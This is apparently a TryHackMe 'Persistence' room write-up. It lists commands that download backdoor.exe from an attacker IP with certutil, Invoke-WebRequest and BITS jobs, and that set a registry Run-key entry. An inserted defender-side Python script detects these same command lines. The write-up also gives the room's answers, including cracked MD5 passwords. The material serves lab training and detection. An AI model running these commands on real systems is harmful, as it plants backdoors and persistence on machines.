Persistence TryHackMe Writeup

https://tryhackme.com/room/persistence

What is persistence?

Low privileged user persistence

Privileged user persistence

Keeping persistence

Task 2. Low privilege user persistence

File Transfer method-1

File Transfer method-2

Invoke-WebRequest http://10.x.x.x/backdoor.exe -Outfile backdoor.exe

File Transfer method-3

certutil -urlcache -split -f http://10.x.x.x/backdoor.exe

Startup folder persistence

Editing registries

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\tryhackme\AppData\Roaming\backdoor.exe"

BITS Jobs

bitsadmin /create backdoor
bitsadmin /addfile backdoor "http://10.2.12.26/backdoor.exe" "C:\Users\tryhackme\Documents\backdoor.exe"
bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c bitsadmin.exe /complete backdoor | start /B C:\Users\tryhackme\Documents\backdoor.exe"

Answer: temporary
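
A defender-side view of the Task 2 commands, added here as an example and not part of the original writeup: a triage function that tags process-creation command lines (for instance from Sysmon Event ID 1 or Security 4688 logs) with the matching MITRE ATT&CK technique and extracts the executable each one points at. The rule set, function names and sample lines are constructed for illustration; a Startup folder drop leaves no command line and needs file monitoring instead.

```python
import re

# (ATT&CK technique, label, pattern) matched against a process command line.
RULES = [
    ("T1105", "certutil URL-cache download",
     re.compile(r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*\bhttps?://", re.I)),
    ("T1105", "Invoke-WebRequest written to disk",
     re.compile(r"\b(?:invoke-webrequest|iwr)\b(?=.*https?://)(?=.*-outfile\b)", re.I)),
    ("T1547.001", "value added under a Run/RunOnce key",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run(?:Once)?\b", re.I)),
    ("T1197", "BITS job given a notify command",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*/setnotifycmdline\b", re.I)),
    ("T1197", "BITS job fetching an executable",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*/addfile\b.*\.exe\b", re.I)),
]
# Local executable paths referenced in the command line (drive letter required).
EXE_PATH = re.compile(r'[A-Za-z]:\\[^"|<>]+?\.exe', re.I)
# Locations a low-privileged user can normally write to.
USER_DIR = re.compile(r"\\(?:Users|ProgramData|Temp)\\", re.I)

def triage(cmdline):
    """Return matched techniques and referenced local executables, or None."""
    hits = [(tid, label) for tid, label, rx in RULES if rx.search(cmdline)]
    if not hits:
        return None
    payloads = EXE_PATH.findall(cmdline)
    return {
        "techniques": sorted({tid for tid, _ in hits}),
        "labels": [label for _, label in hits],
        "payloads": payloads,
        "user_writable": any(USER_DIR.search(p) for p in payloads),
    }

# Constructed sample events: the page's commands plus benign look-alikes.
SAMPLES = [
    r'certutil -urlcache -split -f http://10.x.x.x/backdoor.exe',
    r'Invoke-WebRequest http://10.x.x.x/backdoor.exe -Outfile backdoor.exe',
    r'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\tryhackme\AppData\Roaming\backdoor.exe"',
    r'bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c bitsadmin.exe /complete backdoor | start /B C:\Users\tryhackme\Documents\backdoor.exe"',
    r'certutil -hashfile C:\Users\tryhackme\Downloads\setup.exe SHA256',  # benign
    r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"',    # benign
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line) or "no match", "<-", line[:60])
```

A hit whose payload sits in a user-writable directory is the higher-priority lead, since that is where a low-privileged account can place a binary.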

What is hash dumping?

878d8014606cda29677a44efa1353fc7
https://crackstation.net/

Answer: secret

e0b6050c7280bf4a7bee599cf374fd80

Answer: mypass123
